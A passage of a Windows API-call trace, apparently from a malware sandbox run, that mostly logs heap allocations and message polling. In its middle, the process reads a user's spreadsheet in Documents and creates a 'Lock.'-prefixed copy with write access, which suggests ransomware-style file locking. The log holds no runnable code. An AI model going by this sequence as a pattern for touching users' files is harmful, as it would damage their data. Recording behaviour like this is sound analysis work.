hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0262.742] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b56a8 | out: hHeap=0x25c0000) returned 1 [0262.742] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0262.742] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6bc0 | out: hHeap=0x25c0000) returned 1 [0262.742] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0262.742] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bc8 | out: hHeap=0x25c0000) returned 1 [0262.742] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0262.742] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0262.742] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0262.742] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0262.742] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0262.743] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0262.743] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0262.743] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2150 | out: hHeap=0x25c0000) returned 1 [0262.743] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0288 | out: hHeap=0x25c0000) returned 1 [0262.743] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0262.743] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c38 | out: hHeap=0x25c0000) returned 1 [0262.743] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0262.743] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0262.743] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ca8 | out: hHeap=0x25c0000) returned 1 [0262.743] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6508 | out: hHeap=0x25c0000) returned 1 [0262.743] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0262.743] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d50 | out: hHeap=0x25c0000) returned 1 [0262.743] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0262.743] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0262.744] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0262.744] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b48 | out: hHeap=0x25c0000) returned 1 [0262.744] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0262.744] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0262.744] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0262.744] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d00 | out: hHeap=0x25c0000) returned 1 [0262.744] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0262.744] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0262.744] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0262.744] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a08 | out: hHeap=0x25c0000) returned 1 [0262.744] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0262.744] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0262.744] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0262.745] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0262.745] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0262.745] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0262.745] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0262.745] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0262.745] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0262.745] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0262.745] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0262.745] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0262.745] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0262.745] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0262.745] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e58 [0262.746] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents/icIcTV1 eT9I1Qro.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\icictv1 et9i1qro.xlsx"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0262.746] SetFilePointerEx (in: hFile=0x294, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0262.747] SetFilePointerEx (in: hFile=0x294, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8bf2c8 | out: lpNewFilePointer=0x0) returned 1 [0262.747] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466dd0 [0262.747] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0262.747] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0262.747] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0262.747] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0262.747] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0262.747] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0262.747] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0262.747] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0262.747] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0262.748] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents/Lock.icIcTV1 eT9I1Qro.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lock.icictv1 et9i1qro.xlsx"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x268 [0262.749] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466e30 [0262.749] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0262.749] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1368 [0262.749] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0262.749] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0262.749] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0262.749] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0262.749] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1368 [0262.749] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0262.749] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa230 [0262.749] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0262.750] SetFilePointerEx (in: hFile=0x294, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8bf4ec | out: lpNewFilePointer=0x0) returned 1 [0262.750] ReadFile (in: hFile=0x294, lpBuffer=0x3551008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8bf500, lpOverlapped=0x0 | out: lpBuffer=0x3551008*, lpNumberOfBytesRead=0x8bf500*=0x67e9, lpOverlapped=0x0) returned 1 [0262.756] ReadFile (in: hFile=0x294, lpBuffer=0x3551008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8bf500, lpOverlapped=0x0 | out: lpBuffer=0x3551008*, lpNumberOfBytesRead=0x8bf500*=0x0, lpOverlapped=0x0) returned 1 [0262.757] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0262.757] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0262.757] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f90 [0262.757] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0262.757] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1368 [0262.757] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0262.758] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x67e9) returned 0x3571018 [0262.758] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0262.758] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0262.758] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0262.758] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0262.758] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0262.758] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0262.758] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a08 [0262.758] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1868 [0262.758] CharUpperBuffW (in: lpsz="A6000504F44", cchLength=0xb | out: lpsz="A6000504F44") returned 0xb [0262.758] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a08 | out: hHeap=0x25c0000) returned 1 [0262.758] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0262.758] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f90 [0262.758] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1868 [0262.758] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0262.758] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0262.758] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1368 [0262.758] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0262.758] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x67e9) returned 0x3571018 [0262.758] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0262.758] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1368 [0262.759] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0262.759] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0262.759] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0262.759] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1c28 [0262.759] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa230 [0262.759] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0262.759] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0262.759] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b2088 [0262.759] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0262.759] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0262.759] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0262.759] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa7a0 [0262.759] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a08 [0262.759] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0262.759] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2058 [0262.759] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0262.759] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6aa8 [0262.759] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0262.759] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0262.759] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x67e9) returned 0x24be240 [0262.760] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d00 [0262.760] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e58 [0262.760] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2de8 [0262.760] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0262.760] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c88 [0262.760] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e58 [0262.760] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b48 [0262.760] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0262.760] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18b8 [0262.760] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0262.760] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b64e0 [0262.760] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0262.760] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d50 [0262.760] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0262.760] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1778 [0262.761] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0262.761] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6508 [0262.761] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0262.761] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8a0 [0262.761] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0262.761] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0262.761] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0262.761] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0262.761] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0262.761] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0262.761] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0262.761] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0262.761] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1438 [0262.761] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c10 [0262.761] CharUpperBuffW (in: lpsz="SSA6000504F44", cchLength=0xd | out: lpsz="SSA6000504F44") returned 0xd [0262.761] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0262.761] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0262.761] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0262.762] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0262.762] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0262.762] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0262.762] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0262.762] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0262.762] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0262.762] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0262.762] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0262.762] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0262.762] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2da8 [0262.762] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0262.762] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c10 [0262.762] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0262.762] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0262.762] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0262.762] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c38 [0262.762] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0262.762] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1438 [0262.762] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0262.763] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bc8 [0262.763] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0262.763] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ca8 [0262.763] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0262.763] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0262.763] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0262.763] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0262.763] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0262.763] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0262.763] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0262.763] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0262.763] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0262.763] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0262.763] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0262.763] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0262.764] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0262.764] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0262.764] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0262.764] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0262.764] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0262.764] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0262.764] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0262.764] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0262.764] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0262.764] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0262.764] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0262.764] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0262.764] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0262.764] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0262.764] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0262.764] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0262.765] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0262.765] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0262.765] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0262.765] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0262.765] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0262.765] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0262.765] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0262.765] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0262.765] HeapFree (in: hHeap=0x25c0000, 